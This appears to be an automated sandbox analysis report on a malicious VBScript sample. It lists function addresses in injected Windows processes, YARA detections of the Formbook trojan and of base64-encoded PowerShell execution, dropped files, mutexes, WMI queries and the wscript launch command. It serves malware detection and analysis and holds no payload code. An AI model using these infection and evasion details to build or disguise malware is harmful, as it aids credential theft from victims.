Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227170C0	8_2_227170C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227BF0CC	8_2_227BF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227DB16B	8_2_227DB16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2274516C	8_2_2274516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_226FF172	8_2_226FF172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22798158	8_2_22798158
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227AA118	8_2_227AA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22700100	8_2_22700100
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C81CC	8_2_227C81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2271B1B0	8_2_2271B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227D01AA	8_2_227D01AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2272C6E0	8_2_2272C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C16CC	8_2_227C16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22710770	8_2_22710770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22734750	8_2_22734750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2270C7C0	8_2_2270C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CF7B0	8_2_227CF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22701460	8_2_22701460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C2446	8_2_227C2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CF43F	8_2_227CF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227BE4F6	8_2_227BE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C7571	8_2_227C7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22710535	8_2_22710535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227AD5B0	8_2_227AD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227D0591	8_2_227D0591
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22783A6C	8_2_22783A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CFA49	8_2_227CFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C7A46	8_2_227C7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227BDAC6	8_2_227BDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22755AA0	8_2_22755AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227ADAAC	8_2_227ADAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2270EA80	8_2_2270EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CFB76	8_2_227CFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CAB40	8_2_227CAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22785BF0	8_2_22785BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2274DBF9	8_2_2274DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C6BD7	8_2_227C6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2272FB80	8_2_2272FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22712840	8_2_22712840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2271A840	8_2_2271A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2277D800	8_2_2277D800
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2273E8F0	8_2_2273E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227138E0	8_2_227138E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_226F68B8	8_2_226F68B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22726962	8_2_22726962
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22719950	8_2_22719950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2272B950	8_2_2272B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227129A0	8_2_227129A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227DA9A6	8_2_227DA9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22710E59	8_2_22710E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CEE26	8_2_227CEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CEEDB	8_2_227CEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22719EB0	8_2_22719EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22722E90	8_2_22722E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CCE93	8_2_227CCE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22784F40	8_2_22784F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22730F30	8_2_22730F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22752F28	8_2_22752F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CFF09	8_2_227CFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2271CFE0	8_2_2271CFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22702FC8	8_2_22702FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CFFB1	8_2_227CFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2278EFA0	8_2_2278EFA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22711F92	8_2_22711F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22789C32	8_2_22789C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22710C00	8_2_22710C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22700CF2	8_2_22700CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227CFCF2	8_2_227CFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227B0CB5	8_2_227B0CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C7D73	8_2_227C7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_227C1D5A	8_2_227C1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22713D40	8_2_22713D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2271AD00	8_2_2271AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2270ADE0	8_2_2270ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_2272FDC0	8_2_2272FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 8_2_22728DBF	8_2_22728DBF
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0114C838	10_2_0114C838
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0114A8B8	10_2_0114A8B8
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0114A8AE	10_2_0114A8AE
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0114AA01	10_2_0114AA01
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01152DC4	10_2_01152DC4
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01152DC8	10_2_01152DC8
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_011695E8	10_2_011695E8
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0114C618	10_2_0114C618
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_01151648	10_2_01151648
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_056A375F	10_2_056A375F
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0568CF3B	10_2_0568CF3B
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0568CF3F	10_2_0568CF3F
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_0568678F	10_2_0568678F
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_056869AF	10_2_056869AF
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_05684B78	10_2_05684B78
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_05684A2F	10_2_05684A2F
Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe	Code function: 10_2_05684A25	10_2_05684A25
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D7E4F6	11_2_04D7E4F6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D82446	11_2_04D82446
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CC1460	11_2_04CC1460
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8F43F	11_2_04D8F43F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D90591	11_2_04D90591
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D6D5B0	11_2_04D6D5B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D87571	11_2_04D87571
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD0535	11_2_04CD0535
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D816CC	11_2_04D816CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CEC6E0	11_2_04CEC6E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CCC7C0	11_2_04CCC7C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8F7B0	11_2_04D8F7B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CF4750	11_2_04CF4750
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD0770	11_2_04CD0770
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD70C0	11_2_04CD70C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D7F0CC	11_2_04D7F0CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D870E9	11_2_04D870E9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8F0E0	11_2_04D8F0E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D881CC	11_2_04D881CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D901AA	11_2_04D901AA
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CDB1B0	11_2_04CDB1B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D58158	11_2_04D58158
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D9B16B	11_2_04D9B16B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CBF172	11_2_04CBF172
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D0516C	11_2_04D0516C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CC0100	11_2_04CC0100
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D6A118	11_2_04D6A118
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CEB2C0	11_2_04CEB2C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D712ED	11_2_04D712ED
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD52A0	11_2_04CD52A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D70274	11_2_04D70274
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CDE3F0	11_2_04CDE3F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D903E6	11_2_04D903E6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D1739A	11_2_04D1739A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CBD34C	11_2_04CBD34C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8A352	11_2_04D8A352
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8132D	11_2_04D8132D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8FCF2	11_2_04D8FCF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CC0CF2	11_2_04CC0CF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D70CB5	11_2_04D70CB5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD0C00	11_2_04CD0C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D49C32	11_2_04D49C32
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CEFDC0	11_2_04CEFDC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CCADE0	11_2_04CCADE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CE8DBF	11_2_04CE8DBF
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D81D5A	11_2_04D81D5A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD3D40	11_2_04CD3D40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D87D73	11_2_04D87D73
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CDAD00	11_2_04CDAD00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8EEDB	11_2_04D8EEDB
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8CE93	11_2_04D8CE93
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CE2E90	11_2_04CE2E90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD9EB0	11_2_04CD9EB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD0E59	11_2_04CD0E59
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8EE26	11_2_04D8EE26
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CC2FC8	11_2_04CC2FC8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CDCFE0	11_2_04CDCFE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD1F92	11_2_04CD1F92
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8FFB1	11_2_04D8FFB1
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D44F40	11_2_04D44F40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8FF09	11_2_04D8FF09
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D12F28	11_2_04D12F28
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CF0F30	11_2_04CF0F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD38E0	11_2_04CD38E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CFE8F0	11_2_04CFE8F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CB68B8	11_2_04CB68B8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD2840	11_2_04CD2840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CDA840	11_2_04CDA840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D3D800	11_2_04D3D800
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD29A0	11_2_04CD29A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D9A9A6	11_2_04D9A9A6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CD9950	11_2_04CD9950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CEB950	11_2_04CEB950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CE6962	11_2_04CE6962
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D7DAC6	11_2_04D7DAC6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CCEA80	11_2_04CCEA80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D15AA0	11_2_04D15AA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D6DAAC	11_2_04D6DAAC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8FA49	11_2_04D8FA49
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D87A46	11_2_04D87A46
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D43A6C	11_2_04D43A6C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D86BD7	11_2_04D86BD7
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D45BF0	11_2_04D45BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D0DBF9	11_2_04D0DBF9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04CEFB80	11_2_04CEFB80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8AB40	11_2_04D8AB40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_04D8FB76	11_2_04D8FB76
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CE3070	11_2_02CE3070
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CDC2D6	11_2_02CDC2D6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CDC2E0	11_2_02CDC2E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CDE260	11_2_02CDE260
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CDE040	11_2_02CDE040
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CFB010	11_2_02CFB010
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CE47EC	11_2_02CE47EC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CE47F0	11_2_02CE47F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 11_2_02CDC429	11_2_02CDC429

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04CBB970 appears 268 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04D05130 appears 36 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04D17E54 appears 96 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04D4F290 appears 105 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04D3EA12 appears 86 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 2277EA12 appears 82 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 22745130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 2278F290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 226FB970 appears 268 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 22757E54 appears 96 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: FTG_PD_04024024001.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi64_4268.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5328.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4268, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5328, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@19/10@4/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Argean.Men

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2684:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4268
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5328

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs"
